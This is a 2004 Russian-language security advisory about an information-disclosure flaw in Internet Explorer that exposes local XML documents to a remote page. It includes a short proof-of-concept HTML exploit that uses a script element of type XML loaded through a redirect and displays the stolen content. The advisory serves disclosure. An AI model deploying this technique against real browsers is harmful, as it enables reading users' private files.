Security Lab

Раскрытие важной информации в Internet Explorer

Дата публикации:09.10.2004
Всего просмотров:1662
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer

Описание: Обнаружена уязвимость в Microsoft Internet Explorer. Удаленный атакующий может просмотреть любые XML документы на системе, доступ к которым имеет пользователь.

Удаленный атакующий может с помощью специального HTML кода получить данные из XML документов и перенаправить их себе.

Эксплоит:

<html>
<script>
function f()
{
alert(document.all.x1.XMLDocument.xml);
}
</script>

<body onload="f()">
<script id="x1" language="xml" src="/cgi-bin/redir.pl"></script>
<h1>
Copyright Georgi Guninski <br />
Cannot be used in any database
</h1>
</body>
< /html>

URL производителя: http://www.microsoft.com/

Решение: Способов устранения обнаруженной уязвимости не существует.

Ссылки: Restriction Bypass Vulnerability